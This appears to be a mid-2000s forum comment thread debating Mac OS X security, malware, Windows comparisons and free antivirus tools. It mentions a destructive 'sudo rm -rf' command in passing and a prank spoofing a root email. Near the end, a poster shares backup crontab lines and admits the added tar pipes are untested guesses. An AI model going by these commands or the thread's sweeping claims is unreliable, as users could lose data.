Show me ONE...just ONE OS X VIRUS...not UNIX worm, not 10 year old Office VB script, or somebody just writing a shell script with "sudo rm -rf
Until I see one in the wild everything else is conjecture.
The most successful worms on Windows have not spread because of OS vulnerabilities. They have spread because users are dumb enough to run executables coming from friends in e-mail and whatnot without checking first. The OS helps make this easier by hiding extenisions by default...
.app. If it's saved from certain applications before opening there won't even be any warning before they run it and the damage is done.
.app packages with user perms (which there are many of in OSX usually because installs don't chown all apps to root, and drag-and-drop installations) to make sure the worm will rise again.
There is nothing stopping people from making another sexy-picture-worm that can spread because someone thinks it's a jpg and in fact it's a
Which brings up another point. People say OSX is safer because of the user structure, (e.g. getting prompted for a password for root tasks) However most of the damage done by the worst windows worms don't require elevated privileges. As a user-space app you can still destroy or infect all of your documents, access network shares to spread, start services on high ports to spread or make DOS attacks (probably on MS), add startup items and cron jobs to keep yourself running, drop the executable into existing
The users need to be smarter for the computing environment to be safe. As the mac community expands, so do the number of dumb people using it, which means crackers can exploit what has always been the biggest hole in computer security --- the operator.
then what does that make us? (faithful users of gnu/linux)
Meanwhile, there's this other breed of people (who are, strangely, in the minority) who actually do have functioning immune systems. It's true, they still get sick from time to time, and there is even the occasional epidemic, but for the most part, these people can lead normal, productive lives... except for nuisances like the brickbats hurled at them by the hypochondriacs for being "too smug".
1995 called. They want their FUD email back.
;)
Did they say anything about their meme?
"Every Mac user I know can barely turn on their computer, let alone fire up their browser or word-processor..."
...hence my apology to the Warhammer'ers... we should all apologize to each other a bit more. ...BTW, is there a way to filter out posts written by nits under the age of 25? I would turn that option on in a second...
"Mac users are elitists..."
"Macs are designed for non-technical users/grandmas..."
You're all full of crap...
You're just losers who geek out playing Warhammer and spend thousands of dollars 'gaming' on your supposed 'serious-work-oriented-PC"
Dammit... you went and pushed me to that fanatical place... my apologies... It's just that I too have always kept a PC around for the occasional game, a linux box for tinkering, but my Macs have been the workhorses for 20+ years. I just don't think it is a religous war and see no reason to defame any group's preference...
Just open anything you want, give any program password access when it asks, and never even bother with Apple's security updates, they are not needed since they are just busy work to keep their developers happy, since they love the art of coding for a perfect Operating System and a perfect company.
Ironically it's probably true that someone could choose to never install Apple security updates and they would be fine. That's because with 95% of all other macs on earth patched, a potential virus would not longer attempt to use that patched vector for infection - there would be no profit in it.
You have found computing and OS Utopia... *Queue Harp Music*
So here's the deal, a computer user today has two options:
1) No harp music at all, only discordant guitars.
2) Sit in cafe and listen to harp music, knowing that you may have to leave at some point (even though you've been sitting in the same seat for a few years). When you do leave you might have to stand outside the discordant guitar room for a little while.
Assuming you really like harps, and are displeased with discordant guitar works, it's pretty clear which is the smarter option today even if the harp music will not last forever.
I mean, do you not eat a tasty meal because you know when you finish it'll be gone? "What's the point?".
I think I shall have to label you a Security Eeyore.
P.S. - #2 up above can apply to Linux as well as OS X, don't make any assumptions about what I am including vs. excluding.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Oh, sorry, my bad. I guess I should have been more specific and asked for a vulnerability that isn't from 2004. I should have specified, you know, a current one or one that is actually being exploited on more than a handful of machines.
This doesn't have to be a pissing match you know. It's very simple, there are very few exploitable vulnerabilities in OS X as evidenced by the -- probably very close to 0 -- rate of infections of OS X machines. No one is claiming that OS X is invulnerable and that your favorite OS is the "suxors" or whatever it is you kids say. Right now, all evidence points to OS X being a safer OS. But god forbid someone should make that claim without someone coming up with all kinds reasons why it's not true despite the evidence. Or, how vulnerabilities from two years ago proves OS X is just as vulnerable as Windows.
There's a serious inferiority complex thing going on here. It's sad really. Mac users (if you can make such a broad generalization) aren't nearly as smug as people make them out to be. All of the Mac users I know are security-conscious. They have no illusions about the potential security dangers though they know that OS X is more secure than Windows. Somehow this is interpreted as smugness and having your head in the sand. Go figure.
...Is don't talk about Mac security. Sheesh.
Opener isn't a virus. It doesn't selfmultiply... What Opener is, it's a rootkit. A program you use as a hacker to cover up that you've hacked into the machine. To use it, you have to gain access to the computer somehow BEFOREHAND. A rootkit basically is useless unless you already have root (or at least user) access to the machine in question. The other source mentions only mentions an exploit. No one has said that there aren't exploits for Mac OS X. Only that none has been used to develop viruses. If seccurity indeed is very important (read: secret information, research, webservers etc), an exploit is a very probable vector of infection, and shouldn't be ignored. Unpatched exploits are what hackers use to gain access. In a home setting, the risk of getting targeted attacks is lesser. Basically, the only interesting use of the average home system is as some kind of a botnet. That means hackers are less probable to hack a home system "manually" and instead use viruses, trojans, spyware etcetra. Also, the automated versions often work better in settings where the user has a firewall (think WMF exploit!). If no ports are opened for services, it doesn't really matter if there is a barn-size hole in the service, as you can't access it remotely anyway.
I have a really elegant proof for Fermat's last theorem. If this sig was only a bit longer...
Yes, because as we all know the really valuable data on the computer is the OS and installed programs. You know, the stuff that can be replaced in a few hours.
.Mac subscription includes backup programs, and automatic syncing of a number of things like email and keychains and application preferences and other user-defined documents to an Apple server, in case the worst happens.
All that user data that's completely and utterly irreplacable? Worthless. Who cares if a virus or trojan destroys it? And it obviously doesn't matter if a keylogger running in userspace sniffs out all your bank passwords and sends them to a 3rd party (what, you don't need admin privs to open a socket?!?!), because, hey, the OS itself is still secure!
Actually part of the
But really, what modern viruses actually delete user data? They are far more interested now in capturing user data, or better yet claiming that computer as a zombie. It's simply far more profitable. The idea of viruses actually going after user data is as outmoded as the story submission itself.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
My brother has an older iMac with five user accounts on it, so if one user gets a virus then only 20% of the user data is at immediate risk
The permission system on OS X is quite loose. By default, users can write directly to the Applications directory. That means that malware could easily trojan common programs like iTunes and so on.
So, if a virus somehow got onto the average Mac, I don't see the user account system being any more than trivial protection.
Whenever I hear the word 'Innovation', I reach for my pistol.
So now that everyone's figured out that the article is from 6 years ago, 2000, can we agree that there still hasn't been a successful self-propagating virus for Mac OS X?
I think we can. Let's hope for another 6 years.
Getting OT..
I pulled a similar trick..
We had a guy in our loose knit Linux user group who was kind of a jackass. He had a few friends that were the same. One night I was borded so I connected to his mail server on his Linux box and sent an email from root@localhost to root@localhost with a body of "Ha, got your password!".
Well I was honestly thinking he would have figured it out as the headers and logs would show the originating ip but apparently the obvious was overlooked. At the next meeting, he connected to and discussed the machine and his group of guys and himself basically concluded the machine was owned and rooted and no one could trust any of the binaries or logs on the system. This was after several other people including myself asked about the headers and the logs but we were brushed off. After it got that far I felt it had reached the point of no return and there was no way in hell I was going to speak up and tell them it was a joke. He wiped out his machine.
"in other words, any major OS made by any company other than Microsoft."
True, any OS connected to a network is going to be suseptible. The point in the article wasn't about the Mac OS, it was about the user.
I think the majority of Linux users are well aware of security issues. Every week when I update my packages, at least 90% of updates are security related. I am regularly reminded my system is not immune.
(the majority of) Linux user say they are more secure than windows but, they don't say they are immune to attack. The point the author was making is that the majority of Mac users think they are safe.
He was signling out the users, not the OS.
----- If communism is a system where the government owns business, what do you call a system where business owns govern
I have 4 machines at home, a Windows XP laptop, a Windows 2003 "desktop", an Ubuntu Linux desktop and a iBook. I also have a Linksys router, and I didn't get a virus, a trojan or whatever on any of the machine yet. Now I use to have Windows 2k and I got blaster, once, and the now Windows 2003 "desktop" use to have 2k as well and had a blocked trojan (was there but couldn't connect out) when it was my girlfriend who was taking care of it. I don't consider myself lucky, there are a few steps to keep yourself secure, as far as possible because nobody is immune to system bug. Now, I just do thing in order, first I install the OS, then activate a firewall,and then start to update from trusted place (Windows Update, Apple, or the Ubuntu repositories) all the machine are connected to Internet from the beginning, because I think that in most case my Router will protect me, if I didn't have it, I would not connect them before the firewall is on. After that, I install an antivirus, usually clam, but lately I tried Norton thanks to Google pack, and it seems to work fine. From then it is just a matter of auto updating and scaning whatever you download, it is not 100% protection since an exploit is always arround the corner, but I think it as close as I can get without compromising the ease of use. Just to be clear, I use the integrated firewall in Windows and Mac OS and Firestarter in Linux. Bonus, with multiplateform, if one catch a cold, the other can do the doctor.
developed .NET apps
I hear they have shots for that now - I hope your case cleared up quick.
"There is more worth loving than we have strength to love." - Brian Jay Stanley
if Macs are 5% of the computer market, why aren't 5% of the viruses and spyware on Macs?
Couldn't it be because before the transition to Intel chips the script kiddies and viri writers would have to compile and write their code for the PPC chip? This would be in addition to the effort of finding an exploit to take advantage of in OS X.
Could we be looking at an increase in probes and attacks to OS X as a result of this change to Intel chips? I don't forsee it as happening but time will tell
http://www.zdnetindia.com/insight/commentary/sto ries/132034.html
Great, opens up a remotely expointable hole that could take over your OS...
How about a OSS based solution that is...FREE?
http://www.markallan.co.uk/clamXav/#free
Peer reviewed and effective, go figure.
Remember though, AV definitions will lag a major virus infection by hours to days (maybe even longer) and if you're the first one infected, well, it's too late for you anyways right? There is no substitute for safe/sane User paranoia.
- Keep your System Up to date.
- Keep regular, up to date back ups of your data.
- Many of those lame free pr0n/warez sites make $$ by trying to co-opt you so why would you go to those sketchy web sites at all? It's like asking for it. Get your prOn for free from newsgroups like the smart guys do...
- Don't run any old program download from any old sketchy source like some dumb ass,
- Grow up and quit using pirated shit/warez. The fact that you'll get rooted one day is the inevitable Karma fall out.
DaveCThere are no stupid questions...just stupid people.
You think a Mac user would have the skills for a network attack? ;-)
If more than one mouse button is too confusing, how are they going to launch a network attack?
----- If communism is a system where the government owns business, what do you call a system where business owns govern
1) Outlook's built-in ability to read an email and automatically run its attachment is the sole reaon why virii are a problem.
2) IE's Active X controls, with the ability to download and run a program without user knowledge by simply surfing to a website, is the sole reason spyware and adware are such huge problems.
Last I looked, only Windows has these problems. Yeah, Outlook's on the Mac, but it's not widespread and the virus attachents seem to be written for Windows. Also, many Mac users may not use Outlook.
If I'm wrong, someone please tell me. And while you're at it, please tell me why the Outlook problem exists. Are there really that many users who need their attachments to execute when they read the body of an email? Why can't you turn that shit off?
Let's cut to the chase and provide URLs to FREEWARE every Mac user should have on hand to combat the ***still mythical** malware that is going to bring DOOM to the Macintosh: 1) ClamXav: http://www.markallan.co.uk/clamXav/>Its OpenSource, its updated regularly, its free. So use it already. I regularly receive Windows malware from email or web sites. Rather than possibly pass them on to my Windows using friends, I zap them by checking my Users account folder regularly. 2) Paranoid Android: http://www.unsanity.com/haxies/pa> Its OpenSource, its free. It was originally created to patch a doorway malware could use to attack Mac OS X. That doorway was mostly closed in Apple's 'Security Update 2004-06-07'. But the fact is that Paranoid Android goes way beyond that patch and stops any potentially evil process dead in its tracks. Some people may find it too intrusive, making you verify every little process. But I LOVE IT! It have it on full steam all the time. There ain't no malware gonna get me! It literally runs rings around the MOSX-catch-up security being put into Windows Vista, and is also far more secure than what Mac OS X alone provides. Now some personal comments: - I subscribe to the 'Cry Wolf' theory: The more that certain people, well intentioned as they might be, whine and carry on about how the Mac is DOOMED because of this and that, the less people listen. So when the BIG ONE really does come, they are less prepared. It really was an excellent idea to totally ignore Symantec when they lectured the Mac community, two months in a row, that they were DOOMED if they did not buy Norton Anti-virus. It turns out that NAV has itself got a major security hole, and potentially does some MAJOR damage to your OS. NO ONE should buy or run NAV. NO ONE. It is itself nearly as dangerous as malware! Irony. Then there was attempt by the SANS Institute to perpetrate FUD against MOSX. http://macdailynews.com/index.php/weblog/comments/ 7725/> I personally wrote to the editor of the article and discovered in his reply he had no justification for his DOOM hypothesis beyond a hacker using a nasty AppleScript that would have to be planted via sneaking them onto an insecure MAc workstation. Duh! Any idiot knows that is possible! Only a dolt doesn't lock down their machine when they walk away from it. The guy was crying wolf.
- Then there is the 'Mac users are SMUG' crap. Bite me! What are smug are the Windows users constantly trying to justify their purchases by way of attacking the opposition, namely Macintosh purchasers. Hey Windows users: You have over 15,000 pieces of malware out there in the wild that want to ruin your computer. Deal with it. Thank Microsoft, the authors of your fate. Mac OS X has NO malware at all. Deal with it. Thank the authors of FreeBSD, NeXTstep, Darwin and Mac OS X, who have kept security in the forefront of OS development, where it belongs.
- As an avid listener to the GREAT podcast 'SECURITY NOW!' http://grc.com/securitynow.htm> I am intrigued at all the ways there are to hack a computer either directly or via malware. I am also in shock at just how poor Windows security really is, and amazed at how relatively brilliant Mac OS X security really is. Nonetheless, Mac OS X security IS NOT PERFECT! So I stay on my toes, stay prepared, and make sure doorways to potential hackers are as closed as possible. Listen to this GREAT show and you will learn how. I gave you two kewl keys above to get you started. Use ClamXav and Paranoid Android, for FREE! and tell the 'You're So Smug!' rectal pores to shut the hell up and worry about their own multitudinous security problems.
Totally thrashed my C=64, you damn hacker!!!!
I was doing so good, too. Almost 15 years virus-free, and you hooligans have to screw it all up.
jred
I'm not a mechanic but I play one in my garage...
you'd been running OS X since 10.0.0 with absolutely no security issues occuring at all. Mac OS X is damn secure. deal with it.
Yep, Mac OS X can be hit with a Trojan not a big suprise there. Symantec has some info on this 'MP3Concept Trojan Horse', which is benign. It does use a neat trick to imbed the code in an MP3, but other than that it isn't that special. Tricking someone to run your program isn't really something that we will ever make impossible under every circumstances, but I will admidt that using filename extensions to identify file types is one very stupid thing that Mac OS X copied from Windows, and then hiding them by default only compounds the stupidity.
Exploit, infections from not known: http://www.macintouch.com/opener.html
But "opener" requires a previously comprimized system. A "rootkit" without a viable delivery mechinism isn't really a "virus" or "worm" or even a "trojan". Acording to McAfee: "This threat does not make use of an exploit, so to have the script run successfully on a system and make changes, the user account from which the script is run must have sufficient rights. If no superuser/root/admin access is available many of the subroutines will fail and generate errors." I don't know why McAfee classifies it as a virus/worm since it doesn't seem to have any propagation abilities.
In Wild exploit, known infections: http://news.zdnet.co.uk/internet/security/0,390203 75,39155837,00.htm
True, the exploit mentioned is a tricky thing (potentially allowing code that was downloaded to be run as trusted), however I don't know if any was ever found in the wild - and even then it would still require an administrator's password to do system damage. The "hole" was supposedly patched by Apple's Security Update 2004-06-07 according to Unsanity who had released a little application to guard against the exploit.
If those are the only ones you've found, you haven't really shown any "exploit[s] for a Mac OS X vulnerability", although the MP3Concept Trojan I guess uses some "social hacking" types of tricks that would also work in Windows by hiding that it is an application rather than an mp3 file. Even if we accept a count of 3 (or ten or twenty), Mac OS X would still be comparitively malware-free.
Though there is some merit due to the fact that no computer or OS is ever completely safe, the Mac is vastly safer than Windows and it certainly isn't because Mac's are so outrageously rare that no unscrupulous hackers own one and it also isn't because unscrupulous hackers are so noble that their honor prevents them from writing malware for the Mac. If you believe that, you are deluded. (Of course if you are right then it's all the more reason to buy a Mac!)
So why haven't Mac's seen their fair share of malware?
It is because the OS is simply more secure by design. Are there flaws in that design? Of course there are. But I think the reason reason is more non-technical.
Just try to run and administer a Windows box securely. It's extremely hard to do. A knowledgable security person can do it with a great deal of effort -- but the average home consumer sure can't. You'll also rapidly discover that not all, but a substantial quantity of Windows software is written with the assumption that applications are installed by the same users who will be running them or that all users have administrative rights all the time. The Windows developer community has this flawed mentality and the OS paradigm does very little to enforce a more secure model.
Mac OS X, in contrast, has a completely different security and usage paradigm. Use a Mac and you'll quickly discover that the OS assumes that the OS should live in one part of the filesystem, installed apps in another, and users should only modify files that are found in their home directories -- further, no user is an admin. Even administrative users run unprivileged and have to type their password to perform administrative actions. Developers with any experience on a Mac quickly learn this paradigm. There are exceptions and I have found them, but they are uncommon on the Mac whereas they are quite common on Windows.
There are so many technical reasons why the Mac is more secure, but the underlying non-technical reason is because (a) developers and users alike are basically lazy and will follow the path of least resistence and (b) the path of least resistence on Windows is to not bother with security at all whereas the path of least resistence on the Mac is to actually have a more secure installation... the OS & it's tools actually make doing this seem quite natural.
Bottom line: The average non-technical Windows user really cannot maintain a secure machine and Microsoft's OS paradigm does little to encourage secure devopment practices. The average non-technical Mac user actually can maintain a fairly secure machine without really knowing what they're doing... and that's because the OS makes it easy for both the users and the developers to have good security habbits.
Mac user's should be a little paranoid, but the OS is vastly more secure. While we'll probably get a small number of malware problems, it'll never come close to approaching the scale of security problems enjoyed by Windows users.
This article is what happens when someone gets so carried away with general principles that they lose touch with observed reality.
I'm a Mac user. I know that any OS can be cracked with sufficient effort. I know that viruses, trojans, and malware are a risk, in the general, theoretical sense. I also know that the number of actual, observed OSX exploits has been very low for a good long time.
I don't assume OSX's security is perfect, but I do know that it has a history of being pretty darned good. I know that Apple has built two or three layers of security into OSX (unix access controls and best practices, easy automated patching, and GUI-level alerts like, "The file you're downloading contains a program, are you sure you want it?" and "This program is trying to launch for the first time, do you want it to?"), and history suggests that their strategy works.
I also know that most security software breaks down into two basic feature sets: one set maintains a collection of best practices, access controls, and patch automation that keeps machines from getting infected in the first place, and the other set scans for known viruses to catch anything that got past the 'prevention' layer.
Well, the 'prevention' stuff already built into OSX, and since there are no known viruses for OSX currently in the wild, installing a signature checker would be a waste of time. And once again, history suggests that Apple's prevention strategy seems to be working pretty well.
If you want to talk about improving a Mac's security, don't just wave the "Oooh, it's coming.. booga booga" FUD-stick in my face. Show me how the current set of OSX tools and policies can be beaten, or show me some other set of tools or policies that have a better track-record at preventing infection. As of today, the risk of getting a virus under OSX is significantly lower than the risk of getting hit with a Windows virus before the AV vendors publish a signature that will catch it.
Right now, my observed risk of infection is practically nil. Right now, OSX's default security policies give better results than anything in the Windows market. Right now, I don't know of any products that will lower my risk of infection so much further that they'll be worth the time, money, effort, or computing resources I'd devote to them.
And I remain steadfastly unimpressed by abstract "if you think your security is good enough, it isn't good enough" lines of reasoning. Every security policy accepts some level of risk. Every security policy ends up saying, "well, I guess that's good enough," somewhere. If you don't like where I've drawn the line, show me a better place to draw it, and show me that doing so will be cost-effective in some way. If you can't, I'm gonna call FUD.
I've been doing computer stuff for 20 years now so I won't go into technical details. Just this little comparsion:
./install.bin to read reaction. Notice lack of execution rights due to INet download. Change rights in context menu. Click install.bin. No reaction. ./install.bin to read reaction. Notice user permission problem.
1. Installation of system wide software on Windows:
Doubleclick install.exe.
Wait.
Reboot when promted.
2. Installation of system wide software on Linux
(KDE, but works with any other Desktop):
Click install.bin. No reaction.
Open CLI, run
Type
Switch to su.
Run install.bin.
Wait.
Exit su upon prompt.
3. Installation of system wide software on Mac OS X (Tiger)
Get promted upon download with something like "This may be a program, do you really want to download it?"
Confirm.
Doubleclick the installer.
Get promted about su access requirement.
Confirm continue.
Enter su password in neat OS X su permission popup.
Wait.
Click away finish message.
Do you see any pattern?
(Hint: Number 2 and 3 are simular)
Personally, I think of OS X as a unix variant with minimum hassle, zero hardware compatability issues and some nice extras such as neat looking cigar box cases and an interessting range of commercial software offerings. It plain lacks the PC hardware and driver crappiness.
That's why I ditched Linux as main working OS after 3 years of sole professional Linux usage.
The bitter truth is, security wise Windows isn't even in the same ballpark as the entire unix lot. It's a gaming BIOS with severe security issues due to a substancial inert insecure-by-design problem. Vista will probably change this (they have to), but until today windows and it's standards of usage are nearly a decade behind in basic security.
Bottom line:
When it comes to security, Mac OS X is - simply put - Debian Linux or OpenBSD without the PITA factor.
We suffer more in our imagination than in reality. - Seneca
That might seem incredibly naive, but I don't see any reason why I should trust an OS vendor that basically says I have to buy someone else's software because he's not able to write secure code.
Maybe basic security measures are useful anyway, like the use of a firewall, but my OS doesn't open dozens of ports without my knowing...
The biggest security flaw, in my opinion, is the guy who opens emails titled "I'm a gorgeous girl and I want to have sex with you..."
Cats are intended to teach us that not everything in nature has a function.
doesn't ClamAV work on Mac? I really don't know. but I would think it's close enough to UNIX that it would.
Windows Vista (with the NT Core) will also bring the root/admin abstraction to the Windows World. MS should had done this with WindowsXP, but instead choose compatibility for older applications.MS truly isn't stupid about security, nor is Windows. But Windows has to do something OSX doesn't. It has to support a staggering amount of hardware configurations (without conflicts), and a staggering amount of third party software, and then add in that it is the most targeted Operating System for hackers.
That's bullshit, and you know it. Are you really saying that Windows runs on more hardware configurations and architectures than any flavor of BSD? Are you really saying that poor, poor Microsoft has to bend over for manufacturers who build crappy products and write bad drivers? Are you really saying that OS X has a monolithic plain-vanilla BSD kernel?
Because the answer to those three questions is "No!".
Grr...nVIR.
That the most costly virus I have ever encountered on the Mac. At the time, I was working furiously on my Mac SE, writing a primitive GIS (geographic information system) as an alternative to the usual, mundane term paper. I couldn't get the thing to stop crashing and wound up submitting the program a week late. I had to settle for a B instead of an A, and it turned out the crashing was caused, not by bad coding or Think C bugs as I had assumed, but by the nVIR virus. A quick run of Disinfectant and all was well, except for my marks...
Actually, though, this raises an interesting point. Macs have always had a lesser market share than PCs; yet there were a number virii for the Mac back then. I remember another one (WDEF?) which kept bouncing around from machine to machine via infected floppies. While the virus problem seemed to get steadily worse on the PC, however, it got better on the Mac to the point that they seemed to vanish altogether by the time OS X was rolled out. Hmm...
Like all technical journalists, Bill is obliged to put the 'Security through Obscurity ' myth into every article that refers to the absence of viruses on OS X.
It's rather inconvenient for him that at the same time, Microsoft released a security patch for Vista.
Yep - it's not out yet and they're already patching serious security issues.
So let's see. OS X has how many users ? Vista has how many users ?
Vista is massively more obscure than OS X, yet it's already needing urgent patching.
Obscurity AND insecurity is a new concept. How do they explain that ?
For example, if I want to run a relatively common application such as Quick Books, the user I run this package as must have admin rights while 9x users need not worry because all users have those rights.
The point being that, while you're correct that the NT kernel has quite a bit of security design, you neglect that Microsoft and its third party vendors have largely nullified the same security by not enforcing good security practices in the applications they release.
We all know it: Market share an insecurity are directly related, because hackers go for market share. That's why Apache is such an exploit ridden piece of crap and IIS is known for it's remarkable security. ...
Oh, errrm, wait
We suffer more in our imagination than in reality. - Seneca
I used to be kinda smug, and security was one of my key points when switching to OS X instead of Windows. I follow common sense rules, and have my machine pretty much locked down. One evening a friend brought over his windows laptop and connected to the network. Upon connecting, his firewall told him that a trojan was trying to access his computer. Being that there were only two computers on the network (his windows laptop and my powerbook) I (wrongly) assumed his firewall was misinterpreting my powerbooks attempts to look for shares on his computer. Well, after he left I went and downloaded ClamAV and did a scan. Sure enough, it found a trojan of some sort sitting on my hard drive. Ever since then, I run a scan once a week, just to be on the safe side. Anything can happy to anyone no matter how cautious you are. Granted I do play around on usenet a lot, so it wasn't totally shocking to me that I would eventually end up finding something.
I think as long as other mac users don't become complacent, the mac community as a whole will be more secure, regardless of their knowlege/experience with computers.
I'd say only fanboy's say Linux is secure. Most Linux users, myself included, wouldn't.
I run my updater every week. I'd say about 90%+ of the updates are security related.
Is my system more secure than windows? probably
Do I think my sytem *is* secure? no
----- If communism is a system where the government owns business, what do you call a system where business owns govern
My passion for my Mac is greater than my passion for living.
Somehow I erased part of my last sentence or maybe my thought train strayed - I do weekly backups of the /Users drive and monthly dd backups of the entire disk. It also cleans up the backups when disk space is low (I only keep one monthly around), so I hope I never get a long term infection ;)
/Volumes/backup/Users`date +%d%m%y` /Users &>/var/log/backup`date +%d%m%y`
;rm -rf complete`date +%d%m%y` to remove the uncompressed file at the end. Maybe even an &>/dev/null
if anyone's interested, the crontab entry fragment I use looks like this (minus my bash shell script for cleanup):
00 3 * * 0 tar cvfj
30 3 1 * * dd if=/dev/rdisk0 of=/Volumes/backup/complete`date +%d%m%y` bs=524288 count=3000 &>/var/log/complete`date +%d%m%y`
that is a simple text file created using any text editor. The numbers mean, in order, minute, hour, day of month, month of year, day of the week, with * being a wildcard (any match). It's also possible to do a range, like 1-5 if you want Monday-Friday on the day of the week parameter (0=Sunday, 6=Saturday). use man crontab for more info. You install it with sudo crontab yourtextfilename from a command line if you want it to record as root (otherwise it crons as your username and if your user files get wiped out, your backup will as well).
Note that I have a second hard disk called 'backup' and it is owned by root. Currently it does not compress the dd files but I suspect you can do this by adding something like this to the dd line:
| xargs tar xvfj complete`date +%d%m%y`.tar.bz2
and probably also
I haven't tried the above yet, so I'm speculating.
also, I probably will get rid of the bash script and replace it with an entry that sorts and finds the oldest but I want to do this without a temp file, which is what I'm doing now (and using sort).
make that | xargs tar cvfj complete`date +%d%m%y`.tar.bz2
ever have one of those days?
>> Think about it, if you were going to write a virus to screw with the world, would you spend time finding a way to infect 5% of the world's computers or the other 95%?
:)
Think about this, if you were going to write a virus to screw up with the world, would you spend time finding a way to infect the same computers that *every* script kiddie and their dog has been -- and is still trying to -- infect, and get lost in the crowd; or would you rather spend the effort writing one of the *very* few Mac OSX/*NIX viruses, and become a legend?
You know, I think "The guy who brought Mac OSX to its knees, and wiped the smug smile off its users' faces" sounds pretty appealing
I wonder why it hasn't happened... Oh yeah, marketshare. Right.
-dZ.
Carol vs. Ghost
But corporate systems tend to be better protected (especially in bank/financial services). Most enterprise/corporate systems are protected by firewalls, IDS and other other permeter measures. Windows systems are almost always part of a domain which makes it easier for corporate administration/policies.
There aren't many corporations/enterprises (> 500 employees) with large percentage of Macs deployed. The options for corporate adminstration of Macs are much more limited. Even if they can associate with a domain, you can't remotely control policies.
Most of the hacked systems are poorly patched home users.
If 5% of users are Mac, then how many people are looking for malware on the mac?
How many people are looking for windows malware? A few hundred, maybe? They don't find all of the malware that's around for windows. They mostly find the malware thats poorly written and consumes lots of bandwidth. Well written malware goes around for a long time undetected. If there are only a few hundred people looking for virii/malware/trojans on windows, then there is probably only a handful looking for these on Macs.
If there aren't many people looking for malware on Mac then there won't be much found.
----- If communism is a system where the government owns business, what do you call a system where business owns govern
This subject comes up once in a while on Apple Discussions. The threads mostly consist of a couple of people saying that in general, Mac users are too arrogant when it comes to security issues, and everyone else saying that's a bunch of crap.
/Applications/Utilities when everything that's actually going to MATTER to the user at the end of the day resides in his or her home folder, where no authentication is needed to peek around and play with?
The following is a reposting of portions of a comment I made in one of these threads last year. Needless to say, few agreed. Oh well. Natural selection? Here's the beef:
A note about security, trust, and automobile salesmen.
There is no amount of security that can supplant the need for trust. Mac users who take the arrogant, uninformed stance that we're safe as long as we don't do X and Y only add to the potential field day a future piece of malicious code is bound to have.
You're good against X and Y, because you know about them. But you don't know about factor Z, because you don't know what you don't know.
When you buy a car, is it possible to inspect every single bolt, belt, and wire? No. You have to trust that the person selling you the car is here to make a happy customer out of you, and not a motor vehicle accident at 50MPH after the brakes failed from his malicious modifications.
You have to trust that your source isn't out to do harm.
I know several people who've used p2p software on Windows to download commecial software illegally and were absolutely crippled by viruses. Sure, Windows might indeed be less secure than Mac OS X, but does that mean the same scenario isn't possible under some circumstances that aren't hitherto known? No, it doesn't.
The source(s) of my friends' illegal software was dubious at best; untrustable. They got burned. Karma? Perhaps. Poor foresight? At least.
Without an administrator's password, there is still plenty of damage or intrusion that can be done. Who cares about deleting the stuff in
We trust Apple to ship copies of iPhoto that don't relay information to the government. In the event such a thing were actually to happen, someone would eventually find out and there would be heads on pikes, of course, but there would still be some level of damage done, not just to people's privacy and data, but to the reliability their software sources. I know I'd boycott any manufacturer that started giving my data en masse to any government.
Security doesn't come from code, but from education and trust.
Mikey-San
Karma: +Eleventy billion (mostly affected by watching Celebrity Jeopardy)
...better built...
A suprisingly little known side effect of buying a Mac is that within 48 hours your ph*llus grows two inches longer, or, if you are a female, your b**bs grow a couple of cup sizes. I wonder what happens when you buy a WinDell box or, perish the thought, a Sun Solaris system? Anybody????
Only to idiots, are orders laws.
-- Henning von Tresckow
So it's clearly possible to craft attacks for MacOS-X. But Mac market share is so tiny that few bother. Back before the PowerPC transition, when Apple had more market share, there were more Mac viruses. "Back in the late 1980s, viruses used to be a much bigger problem on Macs than on PCs. We here at F-Secure used to have an antivirus product for Mac but discontinued it after the macro viruses died out".
There have been some gaping holes in MacOS-X browsers that allowed execution of remote code. But nobody bothered to exploit them. Or so it is thought. There's always the possibility of quiet exploits that extract some useful information from the target, ship it somewhere, then clean up and exit.
http://despair.com/pretension.html =)
"Understand you're having a little Jimmy Page trouble."
Just in case anyone isn't in the mood to hunt it down, here's a few links for Little Snitch:
/ 17642
t ml
http://macupdate.com/info.php/id/10426
http://www.versiontracker.com/dyn/moreinfo/macosx
Developer's Site:
http://www.obdev.at/products/littlesnitch/index.h
You call a Mac user arrogant because he doesn't wear a belt, suspenders, and two coils of rope around his middle. But you see, his pants aren't falling down. Yours are. And they keep falling down no matter how many precautions you take. I think you need to have a talk with your tailor.
This may be wrong, but I read somewhere that Unix and its variants simply cannot have viruses, period. Only worms and trojans. This was supposedly due to their use of separate VM space for each process. Fact or urban myth?
Actually (on 10.4, anyway) one has to be in the admin group to have write privileges to the /Applications directory. But good point - even so, I would rather have to perform some kind of sudo to write to that directory at all, even if I am an admin user.
What protection?
What products exist for Windows that will protect against a new worm? What products exist that will protect against a known trojan in DRM?
When you buy anti-virus and anti-spyware software you're really just paying for insurance in case something bad happens. You're not preventing the natural disaster, just helping yourself clean up afterwards.
With OSX and Linux we've already done the work to prevent these disasters so the chances of running into a worm or trojan are far less likely.
This may requires a semi computer literate user base, so it may not be possible on Windows, but almost anyone who uses OSX and Linux "get it" which is why they are unconcerned about these threats.
The only thing you have to fear is fear itself. Remember that. Its so true.
Who's spreading the fear? Who's trying to make you affraid? What's their motive? Sometimes their only motive may be to make you feel as affraid as they already do.. Misery loves company.
No, it's the bundled software (including parts of the OS). So, yes, the user data is more valuable than the prepackaged software, but having a copy of a frequently used program (say aim.exe) writable by anyone using the computer (instead of only the administrator and only immediately after the admin has entered his password) only helps viruses and worms propogate.
Something as simple as Unix file permissions on commonly used programs goes a long way toward data security.
Because of teh way that the HTML control has become the core of so many components, and because of the way the HTML control does not really know whether an object its displaying should be trusted or not, there's is a whole class of attacks that are possible on Windows that are not possible on any other platform. Even Internet Explorer on the Mac was more fundamentally secure than IE on Windows for this reason... basically, when the HTML control goes to display an object, it looks at the file or URL it came from and applies its knowledge of how applications that use the control behave (for example, it knows about the location of temp files, and mailboxes, and the Internet Explorer cache) to decide whether there was any possibility that the object might be untrusted. When this test fails, perhaps because some application puts temporary files in some unexpected place, what's known as a "cross zone" exploit can be implemented.
Every other browser defaults to treating ALL content as untrusted, and only allows shell programs and applications to *add* mechanisms to a *specific* instance of that browser. That's the only secure way to design a browser. Until Microsoft abandons the current design of the HTML control, changes the API so that applications are given control and responsibility for trust, and breaks the existing API, Windows will always be subject to far more problems than any other OS.
